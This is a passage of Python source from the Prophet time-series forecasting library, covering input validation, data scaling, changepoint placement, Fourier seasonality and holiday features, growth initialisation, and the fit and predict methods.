mcmc_samples self.interval_width = interval_width self.uncertainty_samples = uncertainty_samples if scaling not in ("absmax", "minmax"): raise ValueError("scaling must be one of 'absmax' or 'minmax'") self.scaling = scaling # Set during fitting or by other methods self.start = None self.y_min = None self.y_scale = None self.logistic_floor = False self.t_scale = None self.changepoints_t = None self.seasonalities = OrderedDict({}) self.extra_regressors = OrderedDict({}) self.country_holidays = None self.stan_fit = None self.params = {} self.history = None self.history_dates = None self.train_component_cols = None self.component_modes = None self.train_holiday_names = None self.fit_kwargs = {} self.validate_inputs() self._load_stan_backend(stan_backend) def _load_stan_backend(self, stan_backend): if stan_backend is None: for i in StanBackendEnum: try: logger.debug("Trying to load backend: %s", i.name) return self._load_stan_backend(i.name) except Exception as e: logger.debug("Unable to load backend %s (%s), trying the next one", i.name, e) else: self.stan_backend = StanBackendEnum.get_backend_class(stan_backend)() logger.debug("Loaded stan backend: %s", self.stan_backend.get_type()) def validate_inputs(self): """Validates the inputs to Prophet.""" if self.growth not in ('linear', 'logistic', 'flat'): raise ValueError( 'Parameter "growth" should be "linear", "logistic" or "flat".') if not isinstance(self.changepoint_range, (int, float)): raise ValueError("changepoint_range must be a number in [0, 1]'") if ((self.changepoint_range < 0) or (self.changepoint_range > 1)): raise ValueError('Parameter "changepoint_range" must be in [0, 1]') if self.holidays is not None: if not ( isinstance(self.holidays, pd.DataFrame) and 'ds' in self.holidays # noqa W503 and 'holiday' in self.holidays # noqa W503 ): raise ValueError('holidays must be a DataFrame with "ds" and ' '"holiday" columns.') self.holidays['ds'] = pd.to_datetime(self.holidays['ds']) if ( self.holidays['ds'].isnull().any() or self.holidays['holiday'].isnull().any() ): raise ValueError('Found a NaN in holidays dataframe.') has_lower = 'lower_window' in self.holidays has_upper = 'upper_window' in self.holidays if has_lower + has_upper == 1: raise 
ValueError('Holidays must have both lower_window and ' + 'upper_window, or neither') if has_lower: if self.holidays['lower_window'].max() > 0: raise ValueError('Holiday lower_window should be <= 0') if self.holidays['upper_window'].min() < 0: raise ValueError('Holiday upper_window should be >= 0') for h in self.holidays['holiday'].unique(): self.validate_column_name(h, check_holidays=False) if self.seasonality_mode not in ['additive', 'multiplicative']: raise ValueError( 'seasonality_mode must be "additive" or "multiplicative"' ) if self.holidays_mode not in ['additive', 'multiplicative']: raise ValueError( 'holidays_mode must be "additive" or "multiplicative"' ) def validate_column_name(self, name, check_holidays=True, check_seasonalities=True, check_regressors=True): """Validates the name of a seasonality, holiday, or regressor. Parameters ---------- name: string check_holidays: bool check if name already used for holiday check_seasonalities: bool check if name already used for seasonality check_regressors: bool check if name already used for regressor """ if '_delim_' in name: raise ValueError('Name cannot contain "_delim_"') reserved_names = [ 'trend', 'additive_terms', 'daily', 'weekly', 'yearly', 'holidays', 'zeros', 'extra_regressors_additive', 'yhat', 'extra_regressors_multiplicative', 'multiplicative_terms', ] rn_l = [n + '_lower' for n in reserved_names] rn_u = [n + '_upper' for n in reserved_names] reserved_names.extend(rn_l) reserved_names.extend(rn_u) reserved_names.extend([ 'ds', 'y', 'cap', 'floor', 'y_scaled', 'cap_scaled']) if name in reserved_names: raise ValueError( 'Name {name!r} is reserved.'.format(name=name) ) if (check_holidays and self.holidays is not None and name in self.holidays['holiday'].unique()): raise ValueError( 'Name {name!r} already used for a holiday.'.format(name=name) ) if (check_holidays and self.country_holidays is not None and name in get_holiday_names(self.country_holidays)): raise ValueError( 'Name {name!r} is a holiday name in {country_holidays}.' .format(name=name, country_holidays=self.country_holidays) ) if check_seasonalities and name in self.seasonalities: raise ValueError( 'Name {name!r} already used for a seasonality.' .format(name=name) ) if check_regressors and name in self.extra_regressors: raise ValueError( 'Name {name!r} already used for an added regressor.' .format(name=name) ) def setup_dataframe(self, df, initialize_scales=False): """Prepare dataframe for fitting or predicting. Adds a time index and scales y. Creates auxiliary columns 't', 't_ix', 'y_scaled', and 'cap_scaled'. These columns are used during both fitting and predicting. Parameters ---------- df: pd.DataFrame with columns ds, y, and cap if logistic growth. Any specified additional regressors must also be present. initialize_scales: Boolean set scaling factors in self from df. Returns ------- pd.DataFrame prepared for fitting or predicting. """ if 'y' in df: # 'y' will be in training data df['y'] = pd.to_numeric(df['y']) if np.isinf(df['y'].values).any(): raise ValueError('Found infinity in column y.') if df['ds'].dtype == np.int64: df['ds'] = df['ds'].astype(str) df['ds'] = pd.to_datetime(df['ds']) if df['ds'].dt.tz is not None: raise ValueError( 'Column ds has timezone specified, which is not supported. ' 'Remove timezone.' 
) if df['ds'].isnull().any(): raise ValueError('Found NaN in column ds.') for name in self.extra_regressors: if name not in df: raise ValueError( 'Regressor {name!r} missing from dataframe' .format(name=name) ) df[name] = pd.to_numeric(df[name]) if df[name].isnull().any(): raise ValueError( 'Found NaN in column {name!r}'.format(name=name) ) for props in self.seasonalities.values(): condition_name = props['condition_name'] if condition_name is not None: if condition_name not in df: raise ValueError( 'Condition {condition_name!r} missing from dataframe' .format(condition_name=condition_name) ) if not df[condition_name].isin([True, False]).all(): raise ValueError( 'Found non-boolean in column {condition_name!r}' .format(condition_name=condition_name) ) df[condition_name] = df[condition_name].astype('bool') if df.index.name == 'ds': df.index.name = None df = df.sort_values('ds', kind='mergesort') df = df.reset_index(drop=True) self.initialize_scales(initialize_scales, df) if self.logistic_floor: if 'floor' not in df: raise ValueError('Expected column "floor".') else: if self.scaling == "absmax": df['floor'] = 0. elif self.scaling == "minmax": df['floor'] = self.y_min if self.growth == 'logistic': if 'cap' not in df: raise ValueError( 'Capacities must be supplied for logistic growth in ' 'column "cap"' ) if (df['cap'] <= df['floor']).any(): raise ValueError( 'cap must be greater than floor (which defaults to 0).' ) df['cap_scaled'] = (df['cap'] - df['floor']) / self.y_scale df['t'] = (df['ds'] - self.start) / self.t_scale if 'y' in df: df['y_scaled'] = (df['y'] - df['floor']) / self.y_scale for name, props in self.extra_regressors.items(): df[name] = ((df[name] - props['mu']) / props['std']) return df def initialize_scales(self, initialize_scales, df): """Initialize model scales. Sets model scaling factors using df. Parameters ---------- initialize_scales: Boolean set the scales or not. df: pd.DataFrame for setting scales. """ if not initialize_scales: return if self.growth == 'logistic' and 'floor' in df: self.logistic_floor = True if self.scaling == "absmax": self.y_min = float((df['y'] - df['floor']).abs().min()) self.y_scale = float((df['y'] - df['floor']).abs().max()) elif self.scaling == "minmax": self.y_min = df['floor'].min() self.y_scale = float(df['cap'].max() - self.y_min) else: if self.scaling == "absmax": self.y_min = 0. self.y_scale = float((df['y']).abs().max()) elif self.scaling == "minmax": self.y_min = df['y'].min() self.y_scale = float(df['y'].max() - self.y_min) if self.y_scale == 0: self.y_scale = 1.0 self.start = df['ds'].min() self.t_scale = df['ds'].max() - self.start for name, props in self.extra_regressors.items(): standardize = props['standardize'] n_vals = len(df[name].unique()) if n_vals < 2: standardize = False if standardize == 'auto': if set(df[name].unique()) == {1, 0}: standardize = False # Don't standardize binary variables. else: standardize = True if standardize: mu = float(df[name].mean()) std = float(df[name].std()) self.extra_regressors[name]['mu'] = mu self.extra_regressors[name]['std'] = std def set_changepoints(self): """Set changepoints Sets m$changepoints to the dates of changepoints. Either: 1) The changepoints were passed in explicitly. A) They are empty. B) They are not empty, and need validation. 2) We are generating a grid of them. 3) The user prefers no changepoints be used. 
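        In every case self.changepoints_t is set to the changepoint times on
        the scaled time axis, or to a single dummy value of 0 when there are
        no changepoints.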
""" if self.changepoints is not None: if len(self.changepoints) == 0: pass else: too_low = min(self.changepoints) < self.history['ds'].min() too_high = max(self.changepoints) > self.history['ds'].max() if too_low or too_high: raise ValueError( 'Changepoints must fall within training data.') else: # Place potential changepoints evenly through first # `changepoint_range` proportion of the history hist_size = int(np.floor(self.history.shape[0] * self.changepoint_range)) if self.n_changepoints + 1 > hist_size: self.n_changepoints = hist_size - 1 logger.info( 'n_changepoints greater than number of observations. ' 'Using {n_changepoints}.' .format(n_changepoints=self.n_changepoints) ) if self.n_changepoints > 0: cp_indexes = ( np.linspace(0, hist_size - 1, self.n_changepoints + 1) .round() .astype(int) ) self.changepoints = ( self.history.iloc[cp_indexes]['ds'].tail(-1) ) else: # set empty changepoints self.changepoints = pd.Series(pd.to_datetime([]), name='ds') if len(self.changepoints) > 0: self.changepoints_t = np.sort(np.array( (self.changepoints - self.start) / self.t_scale)) else: self.changepoints_t = np.array([0]) # dummy changepoint @staticmethod def fourier_series( dates: pd.Series, period: Union[int, float], series_order: int, ) -> NDArray[np.float_]: """Provides Fourier series components with the specified frequency and order. Parameters ---------- dates: pd.Series containing timestamps. period: Number of days of the period. series_order: Number of components. Returns ------- Matrix with seasonality features. """ if not (series_order >= 1): raise ValueError("series_order must be >= 1") # convert to days since epoch t = dates.to_numpy(dtype=np.int64) // NANOSECONDS_TO_SECONDS / (3600 * 24.) x_T = t * np.pi * 2 fourier_components = np.empty((dates.shape[0], 2 * series_order)) for i in range(series_order): c = x_T * (i + 1) / period fourier_components[:, 2 * i] = np.sin(c) fourier_components[:, (2 * i) + 1] = np.cos(c) return fourier_components @classmethod def make_seasonality_features(cls, dates, period, series_order, prefix): """Data frame with seasonality features. Parameters ---------- cls: Prophet class. dates: pd.Series containing timestamps. period: Number of days of the period. series_order: Number of components. prefix: Column name prefix. Returns ------- pd.DataFrame with seasonality features. """ features = cls.fourier_series(dates, period, series_order) columns = [ '{}_delim_{}'.format(prefix, i + 1) for i in range(features.shape[1]) ] return pd.DataFrame(features, columns=columns) def construct_holiday_dataframe(self, dates): """Construct a dataframe of holiday dates. Will combine self.holidays with the built-in country holidays corresponding to input dates, if self.country_holidays is set. Parameters ---------- dates: pd.Series containing timestamps used for computing seasonality. Returns ------- dataframe of holiday dates, in holiday dataframe format used in initialization. 
""" all_holidays = pd.DataFrame() if self.holidays is not None: all_holidays = self.holidays.copy() if self.country_holidays is not None: year_list = list({x.year for x in dates}) country_holidays_df = make_holidays_df( year_list=year_list, country=self.country_holidays ) all_holidays = pd.concat((all_holidays, country_holidays_df), sort=False) all_holidays.reset_index(drop=True, inplace=True) # Drop future holidays not previously seen in training data if self.train_holiday_names is not None: # Remove holiday names didn't show up in fit index_to_drop = all_holidays.index[ np.logical_not( all_holidays.holiday.isin(self.train_holiday_names) ) ] all_holidays = all_holidays.drop(index_to_drop) # Add holiday names in fit but not in predict with ds as NA holidays_to_add = pd.DataFrame({ 'holiday': self.train_holiday_names[ np.logical_not(self.train_holiday_names .isin(all_holidays.holiday)) ] }) all_holidays = pd.concat((all_holidays, holidays_to_add), sort=False) all_holidays.reset_index(drop=True, inplace=True) return all_holidays def make_holiday_features(self, dates, holidays): """Construct a dataframe of holiday features. Parameters ---------- dates: pd.Series containing timestamps used for computing seasonality. holidays: pd.Dataframe containing holidays, as returned by construct_holiday_dataframe. Returns ------- holiday_features: pd.DataFrame with a column for each holiday. prior_scale_list: List of prior scales for each holiday column. holiday_names: List of names of holidays """ # Holds columns of our future matrix. expanded_holidays = defaultdict(lambda: np.zeros(dates.shape[0])) prior_scales = {} # Makes an index so we can perform `get_loc` below. # Strip to just dates. row_index = pd.DatetimeIndex(dates.dt.date) for row in holidays.itertuples(): dt = row.ds.date() try: lw = int(getattr(row, 'lower_window', 0)) uw = int(getattr(row, 'upper_window', 0)) except ValueError: lw = 0 uw = 0 ps = float(getattr(row, 'prior_scale', self.holidays_prior_scale)) if np.isnan(ps): ps = float(self.holidays_prior_scale) if row.holiday in prior_scales and prior_scales[row.holiday] != ps: raise ValueError( 'Holiday {holiday!r} does not have consistent prior ' 'scale specification.'.format(holiday=row.holiday) ) if ps <= 0: raise ValueError('Prior scale must be > 0') prior_scales[row.holiday] = ps for offset in range(lw, uw + 1): occurrence = pd.to_datetime(dt + timedelta(days=offset)) try: loc = row_index.get_loc(occurrence) except KeyError: loc = None key = '{}_delim_{}{}'.format( row.holiday, '+' if offset >= 0 else '-', abs(offset) ) if loc is not None: expanded_holidays[key][loc] = 1. else: expanded_holidays[key] # Access key to generate value holiday_features = pd.DataFrame(expanded_holidays) # Make sure column order is consistent holiday_features = holiday_features[sorted(holiday_features.columns .tolist())] prior_scale_list = [ prior_scales[h.split('_delim_')[0]] for h in holiday_features.columns ] holiday_names = list(prior_scales.keys()) # Store holiday names used in fit if self.train_holiday_names is None: self.train_holiday_names = pd.Series(holiday_names) return holiday_features, prior_scale_list, holiday_names def add_regressor(self, name, prior_scale=None, standardize='auto', mode=None): """Add an additional regressor to be used for fitting and predicting. The dataframe passed to `fit` and `predict` will have a column with the specified name to be used as a regressor. When standardize='auto', the regressor will be standardized unless it is binary. 
The regression coefficient is given a prior with the specified scale parameter. Decreasing the prior scale will add additional regularization. If no prior scale is provided, self.holidays_prior_scale will be used. Mode can be specified as either 'additive' or 'multiplicative'. If not specified, self.seasonality_mode will be used. 'additive' means the effect of the regressor will be added to the trend, 'multiplicative' means it will multiply the trend. Parameters ---------- name: string name of the regressor. prior_scale: optional float scale for the normal prior. If not provided, self.holidays_prior_scale will be used. standardize: optional, specify whether this regressor will be standardized prior to fitting. Can be 'auto' (standardize if not binary), True, or False. mode: optional, 'additive' or 'multiplicative'. Defaults to self.seasonality_mode. Returns ------- The prophet object. """ if self.history is not None: raise Exception( "Regressors must be added prior to model fitting.") self.validate_column_name(name, check_regressors=False) if prior_scale is None: prior_scale = float(self.holidays_prior_scale) if mode is None: mode = self.seasonality_mode if prior_scale <= 0: raise ValueError('Prior scale must be > 0') if mode not in ['additive', 'multiplicative']: raise ValueError("mode must be 'additive' or 'multiplicative'") self.extra_regressors[name] = { 'prior_scale': prior_scale, 'standardize': standardize, 'mu': 0., 'std': 1., 'mode': mode, } return self def add_seasonality(self, name, period, fourier_order, prior_scale=None, mode=None, condition_name=None): """Add a seasonal component with specified period, number of Fourier components, and prior scale. Increasing the number of Fourier components allows the seasonality to change more quickly (at risk of overfitting). Default values for yearly and weekly seasonalities are 10 and 3 respectively. Increasing prior scale will allow this seasonality component more flexibility, decreasing will dampen it. If not provided, will use the seasonality_prior_scale provided on Prophet initialization (defaults to 10). Mode can be specified as either 'additive' or 'multiplicative'. If not specified, self.seasonality_mode will be used (defaults to additive). Additive means the seasonality will be added to the trend, multiplicative means it will multiply the trend. If condition_name is provided, the dataframe passed to `fit` and `predict` should have a column with the specified condition_name containing booleans which decides when to apply seasonality. Parameters ---------- name: string name of the seasonality component. period: float number of days in one period. fourier_order: int number of Fourier components to use. prior_scale: optional float prior scale for this component. mode: optional 'additive' or 'multiplicative' condition_name: string name of the seasonality condition. Returns ------- The prophet object. 
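        Examples
        --------
        A minimal sketch adding a monthly component to a new model, assuming a
        training dataframe df (the 30.5-day period and fourier_order=5 are
        illustrative choices):

        >>> m = Prophet(weekly_seasonality=False)
        >>> m.add_seasonality(name='monthly', period=30.5, fourier_order=5)
        >>> m.fit(df)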
""" if self.history is not None: raise Exception( 'Seasonality must be added prior to model fitting.') if name not in ['daily', 'weekly', 'yearly']: # Allow overwriting built-in seasonalities self.validate_column_name(name, check_seasonalities=False) if prior_scale is None: ps = self.seasonality_prior_scale else: ps = float(prior_scale) if ps <= 0: raise ValueError('Prior scale must be > 0') if fourier_order <= 0: raise ValueError('Fourier Order must be > 0') if mode is None: mode = self.seasonality_mode if mode not in ['additive', 'multiplicative']: raise ValueError('mode must be "additive" or "multiplicative"') if condition_name is not None: self.validate_column_name(condition_name) self.seasonalities[name] = { 'period': period, 'fourier_order': fourier_order, 'prior_scale': ps, 'mode': mode, 'condition_name': condition_name, } return self def add_country_holidays(self, country_name): """Add in built-in holidays for the specified country. These holidays will be included in addition to any specified on model initialization. Holidays will be calculated for arbitrary date ranges in the history and future. See the online documentation for the list of countries with built-in holidays. Built-in country holidays can only be set for a single country. Parameters ---------- country_name: Name of the country, like 'UnitedStates' or 'US' Returns ------- The prophet object. """ if self.history is not None: raise Exception( "Country holidays must be added prior to model fitting." ) # Validate names. for name in get_holiday_names(country_name): # Allow merging with existing holidays self.validate_column_name(name, check_holidays=False) # Set the holidays. if self.country_holidays is not None: logger.warning( 'Changing country holidays from {country_holidays!r} to ' '{country_name!r}.' .format( country_holidays=self.country_holidays, country_name=country_name, ) ) self.country_holidays = country_name return self def make_all_seasonality_features(self, df): """Dataframe with seasonality features. Includes seasonality features, holiday features, and added regressors. Parameters ---------- df: pd.DataFrame with dates for computing seasonality features and any added regressors. Returns ------- pd.DataFrame with regression features. list of prior scales for each column of the features dataframe. Dataframe with indicators for which regression components correspond to which columns. Dictionary with keys 'additive' and 'multiplicative' listing the component names for each mode of seasonality. 
""" seasonal_features = [] prior_scales = [] modes = {'additive': [], 'multiplicative': []} # Seasonality features for name, props in self.seasonalities.items(): features = self.make_seasonality_features( df['ds'], props['period'], props['fourier_order'], name, ) if props['condition_name'] is not None: features[~df[props['condition_name']]] = 0 seasonal_features.append(features) prior_scales.extend( [props['prior_scale']] * features.shape[1]) modes[props['mode']].append(name) # Holiday features holidays = self.construct_holiday_dataframe(df['ds']) if len(holidays) > 0: features, holiday_priors, holiday_names = ( self.make_holiday_features(df['ds'], holidays) ) seasonal_features.append(features) prior_scales.extend(holiday_priors) modes[self.holidays_mode].extend(holiday_names) # Additional regressors for name, props in self.extra_regressors.items(): seasonal_features.append(pd.DataFrame(df[name])) prior_scales.append(props['prior_scale']) modes[props['mode']].append(name) # Dummy to prevent empty X if len(seasonal_features) == 0: seasonal_features.append( pd.DataFrame({'zeros': np.zeros(df.shape[0])})) prior_scales.append(1.) seasonal_features = pd.concat(seasonal_features, axis=1) component_cols, modes = self.regressor_column_matrix( seasonal_features, modes ) return seasonal_features, prior_scales, component_cols, modes def regressor_column_matrix(self, seasonal_features, modes): """Dataframe indicating which columns of the feature matrix correspond to which seasonality/regressor components. Includes combination components, like 'additive_terms'. These combination components will be added to the 'modes' input. Parameters ---------- seasonal_features: Constructed seasonal features dataframe modes: Dictionary with keys 'additive' and 'multiplicative' listing the component names for each mode of seasonality. Returns ------- component_cols: A binary indicator dataframe with columns seasonal components and rows columns in seasonal_features. Entry is 1 if that columns is used in that component. modes: Updated input with combination components. 
""" components = pd.DataFrame({ 'col': np.arange(seasonal_features.shape[1]), 'component': [ x.split('_delim_')[0] for x in seasonal_features.columns ], }) # Add total for holidays if self.train_holiday_names is not None: components = self.add_group_component( components, 'holidays', self.train_holiday_names.unique()) # Add totals additive and multiplicative components, and regressors for mode in ['additive', 'multiplicative']: components = self.add_group_component( components, mode + '_terms', modes[mode] ) regressors_by_mode = [ r for r, props in self.extra_regressors.items() if props['mode'] == mode ] components = self.add_group_component( components, 'extra_regressors_' + mode, regressors_by_mode) # Add combination components to modes modes[mode].append(mode + '_terms') modes[mode].append('extra_regressors_' + mode) # After all of the additive/multiplicative groups have been added, modes[self.holidays_mode].append('holidays') # Convert to a binary matrix component_cols = pd.crosstab( components['col'], components['component'], ).sort_index(level='col') # Add columns for additive and multiplicative terms, if missing for name in ['additive_terms', 'multiplicative_terms']: if name not in component_cols: component_cols[name] = 0 # Remove the placeholder component_cols.drop('zeros', axis=1, inplace=True, errors='ignore') # Validation if (max(component_cols['additive_terms'] + component_cols['multiplicative_terms']) > 1): raise Exception('A bug occurred in seasonal components.') # Compare to the training, if set. if self.train_component_cols is not None: component_cols = component_cols[self.train_component_cols.columns] if not component_cols.equals(self.train_component_cols): raise Exception('A bug occurred in constructing regressors.') return component_cols, modes def add_group_component(self, components, name, group): """Adds a component with given name that contains all of the components in group. Parameters ---------- components: Dataframe with components. name: Name of new group component. group: List of components that form the group. Returns ------- Dataframe with components. """ new_comp = components[components['component'].isin(set(group))].copy() group_cols = new_comp['col'].unique() if len(group_cols) > 0: new_comp = pd.DataFrame({'col': group_cols, 'component': name}) components = pd.concat([components, new_comp]) return components def parse_seasonality_args(self, name, arg, auto_disable, default_order): """Get number of fourier components for built-in seasonalities. Parameters ---------- name: string name of the seasonality component. arg: 'auto', True, False, or number of fourier components as provided. auto_disable: bool if seasonality should be disabled when 'auto'. default_order: int default fourier order Returns ------- Number of fourier components, or 0 for disabled. """ if arg == 'auto': fourier_order = 0 if name in self.seasonalities: logger.info( 'Found custom seasonality named {name!r}, disabling ' 'built-in {name!r} seasonality.'.format(name=name) ) elif auto_disable: logger.info( 'Disabling {name} seasonality. Run prophet with ' '{name}_seasonality=True to override this.' .format(name=name) ) else: fourier_order = default_order elif arg is True: fourier_order = default_order elif arg is False: fourier_order = 0 else: fourier_order = int(arg) return fourier_order def set_auto_seasonalities(self): """Set seasonalities that were left on auto. Turns on yearly seasonality if there is >=2 years of history. 
Turns on weekly seasonality if there is >=2 weeks of history, and the spacing between dates in the history is <7 days. Turns on daily seasonality if there is >=2 days of history, and the spacing between dates in the history is <1 day. """ first = self.history['ds'].min() last = self.history['ds'].max() dt = self.history['ds'].diff() min_dt = dt.iloc[dt.values.nonzero()[0]].min() # Yearly seasonality yearly_disable = last - first < pd.Timedelta(days=730) fourier_order = self.parse_seasonality_args( 'yearly', self.yearly_seasonality, yearly_disable, 10) if fourier_order > 0: self.seasonalities['yearly'] = { 'period': 365.25, 'fourier_order': fourier_order, 'prior_scale': self.seasonality_prior_scale, 'mode': self.seasonality_mode, 'condition_name': None } # Weekly seasonality weekly_disable = ((last - first < pd.Timedelta(weeks=2)) or (min_dt >= pd.Timedelta(weeks=1))) fourier_order = self.parse_seasonality_args( 'weekly', self.weekly_seasonality, weekly_disable, 3) if fourier_order > 0: self.seasonalities['weekly'] = { 'period': 7, 'fourier_order': fourier_order, 'prior_scale': self.seasonality_prior_scale, 'mode': self.seasonality_mode, 'condition_name': None } # Daily seasonality daily_disable = ((last - first < pd.Timedelta(days=2)) or (min_dt >= pd.Timedelta(days=1))) fourier_order = self.parse_seasonality_args( 'daily', self.daily_seasonality, daily_disable, 4) if fourier_order > 0: self.seasonalities['daily'] = { 'period': 1, 'fourier_order': fourier_order, 'prior_scale': self.seasonality_prior_scale, 'mode': self.seasonality_mode, 'condition_name': None } @staticmethod def linear_growth_init(df): """Initialize linear growth. Provides a strong initialization for linear growth by calculating the growth and offset parameters that pass the function through the first and last points in the time series. Parameters ---------- df: pd.DataFrame with columns ds (date), y_scaled (scaled time series), and t (scaled time). Returns ------- A tuple (k, m) with the rate (k) and offset (m) of the linear growth function. """ i0, i1 = df['ds'].idxmin(), df['ds'].idxmax() T = df['t'].iloc[i1] - df['t'].iloc[i0] k = (df['y_scaled'].iloc[i1] - df['y_scaled'].iloc[i0]) / T m = df['y_scaled'].iloc[i0] - k * df['t'].iloc[i0] return (k, m) @staticmethod def logistic_growth_init(df): """Initialize logistic growth. Provides a strong initialization for logistic growth by calculating the growth and offset parameters that pass the function through the first and last points in the time series. Parameters ---------- df: pd.DataFrame with columns ds (date), cap_scaled (scaled capacity), y_scaled (scaled time series), and t (scaled time). Returns ------- A tuple (k, m) with the rate (k) and offset (m) of the logistic growth function. """ i0, i1 = df['ds'].idxmin(), df['ds'].idxmax() T = df['t'].iloc[i1] - df['t'].iloc[i0] # Force valid values, in case y > cap or y < 0 C0 = df['cap_scaled'].iloc[i0] C1 = df['cap_scaled'].iloc[i1] y0 = max(0.01 * C0, min(0.99 * C0, df['y_scaled'].iloc[i0])) y1 = max(0.01 * C1, min(0.99 * C1, df['y_scaled'].iloc[i1])) r0 = C0 / y0 r1 = C1 / y1 if abs(r0 - r1) <= 0.01: r0 = 1.05 * r0 L0 = np.log(r0 - 1) L1 = np.log(r1 - 1) # Initialize the offset m = L0 * T / (L0 - L1) # And the rate k = (L0 - L1) / T return (k, m) @staticmethod def flat_growth_init(df): """Initialize flat growth. Provides a strong initialization for flat growth. Sets the growth to 0 and offset parameter as mean of history y_scaled values. 
Parameters ---------- df: pd.DataFrame with columns ds (date), y_scaled (scaled time series), and t (scaled time). Returns ------- A tuple (k, m) with the rate (k) and offset (m) of the linear growth function. """ k = 0 m = df['y_scaled'].mean() return k, m def preprocess(self, df: pd.DataFrame, **kwargs) -> ModelInputData: """ Reformats historical data, standardizes y and extra regressors, sets seasonalities and changepoints. Saves the preprocessed data to the instantiated object, and also returns the relevant components as a ModelInputData object. """ if ('ds' not in df) or ('y' not in df): raise ValueError( 'Dataframe must have columns "ds" and "y" with the dates and ' 'values respectively.' ) history = df[df['y'].notnull()].copy() if history.shape[0] < 2: raise ValueError('Dataframe has less than 2 non-NaN rows.') self.history_dates = pd.to_datetime(pd.Series(df['ds'].unique(), name='ds')).sort_values() self.history = self.setup_dataframe(history, initialize_scales=True) self.set_auto_seasonalities() seasonal_features, prior_scales, component_cols, modes = ( self.make_all_seasonality_features(self.history)) self.train_component_cols = component_cols self.component_modes = modes self.fit_kwargs = deepcopy(kwargs) self.set_changepoints() if self.growth in ['linear', 'flat']: cap = np.zeros(self.history.shape[0]) else: cap = self.history['cap_scaled'] return ModelInputData( T=self.history.shape[0], S=len(self.changepoints_t), K=seasonal_features.shape[1], tau=self.changepoint_prior_scale, trend_indicator=TrendIndicator[self.growth.upper()].value, y=self.history['y_scaled'], t=self.history['t'], t_change=self.changepoints_t, X=seasonal_features, sigmas=prior_scales, s_a=component_cols['additive_terms'], s_m=component_cols['multiplicative_terms'], cap=cap, ) def calculate_initial_params(self, num_total_regressors: int) -> ModelParams: """ Calculates initial parameters for the model based on the preprocessed history. Parameters ---------- num_total_regressors: the count of seasonality fourier components plus holidays plus extra regressors. """ if self.growth == 'linear': k, m = self.linear_growth_init(self.history) elif self.growth == 'flat': k, m = self.flat_growth_init(self.history) elif self.growth == 'logistic': k, m = self.logistic_growth_init(self.history) return ModelParams( k=k, m=m, delta=np.zeros_like(self.changepoints_t), beta=np.zeros(num_total_regressors), sigma_obs=1.0, ) def fit(self, df, **kwargs): """Fit the Prophet model. This sets self.params to contain the fitted model parameters. It is a dictionary parameter names as keys and the following items: k (Mx1 array): M posterior samples of the initial slope. m (Mx1 array): The initial intercept. delta (MxN array): The slope change at each of N changepoints. beta (MxK matrix): Coefficients for K seasonality features. sigma_obs (Mx1 array): Noise level. Note that M=1 if MAP estimation. Parameters ---------- df: pd.DataFrame containing the history. Must have columns ds (date type) and y, the time series. If self.growth is 'logistic', then df must also have a column cap that specifies the capacity at each ds. kwargs: Additional arguments passed to the optimizing or sampling functions in Stan. Returns ------- The fitted Prophet object. """ if self.history is not None: raise Exception('Prophet object can only be fit once. 
' 'Instantiate a new object.') model_inputs = self.preprocess(df, **kwargs) initial_params = self.calculate_initial_params(model_inputs.K) dat = dataclasses.asdict(model_inputs) stan_init = dataclasses.asdict(initial_params) if self.history['y'].min() == self.history['y'].max() and \ (self.growth == 'linear' or self.growth == 'flat'): self.params = stan_init self.params['sigma_obs'] = 1e-9 for par in self.params: self.params[par] = np.array([self.params[par]]) elif self.mcmc_samples > 0: self.params = self.stan_backend.sampling(stan_init, dat, self.mcmc_samples, **kwargs) else: self.params = self.stan_backend.fit(stan_init, dat, **kwargs) self.stan_fit = self.stan_backend.stan_fit # If no changepoints were requested, replace delta with 0s if len(self.changepoints) == 0: # Fold delta into the base rate k self.params['k'] = ( self.params['k'] + self.params['delta'].reshape(-1) ) self.params['delta'] = (np.zeros(self.params['delta'].shape) .reshape((-1, 1))) return self def predict(self, df: pd.DataFrame = None, vectorized: bool = True) -> pd.DataFrame: """Predict using the prophet model. Parameters ---------- df: pd.DataFrame with dates for predictions (column ds), and capacity (column cap) if logistic growth. If not provided, predictions are made on the history. vectorized: Whether to use a vectorized method to compute uncertainty intervals. Suggest using True (the default) for much faster runtimes in most cases, except when (growth = 'logistic' and mcmc_samples > 0). Returns ------- A pd.DataFrame with the forecast components. """ if self.history is None: raise Exception('Model has not been fit.') if df is None: df = self.history.copy() else: if df.shape[0] == 0: raise ValueError('Dataframe has no rows.') df = self.setup_dataframe(df.copy()) df['trend'] = self.predict_trend(df) seasonal_components = self.predict_seasonal_components(df) if self.uncertainty_samples: intervals = self.predict_uncertainty(df, vectorized) else: intervals = None # Drop columns except ds, cap, floor, and trend cols = ['ds', 'trend'] if 'cap' in df: cols.append('cap') if self.logistic_floor: cols.append('floor') # Add in forecast components df2 = pd.concat((df[cols], intervals, seasonal_components), axis=1) df2['yhat'] = ( df2['trend'] * (1 + df2['multiplicative_terms']) + df2['additive_terms'] ) return df2 @staticmethod def piecewise_linear(t, deltas, k, m, changepoint_ts): """Evaluate the piecewise linear function. Parameters ---------- t: np.array of times on which the function is evaluated. deltas: np.array of rate changes at each changepoint. k: Float initial rate. m: Float initial offset. changepoint_ts: np.array of changepoint times. Returns ------- Vector y(t). """ deltas_t = (changepoint_ts[None, :] <= t[..., None]) * deltas k_t = deltas_t.sum(axis=1) + k m_t = (deltas_t * -changepoint_ts).sum(axis=1) + m return k_t * t + m_t @staticmethod def piecewise_logistic(t, cap, deltas, k, m, changepoint_ts): """Evaluate the piecewise logistic function. Parameters ---------- t: np.array of times on which the function is evaluated. cap: np.array of capacities at each t. deltas: np.array of rate changes at each changepoint. k: Float initial rate. m: Float initial offset. changepoint_ts: np.array of changepoint times. Returns ------- Vector y(t). 
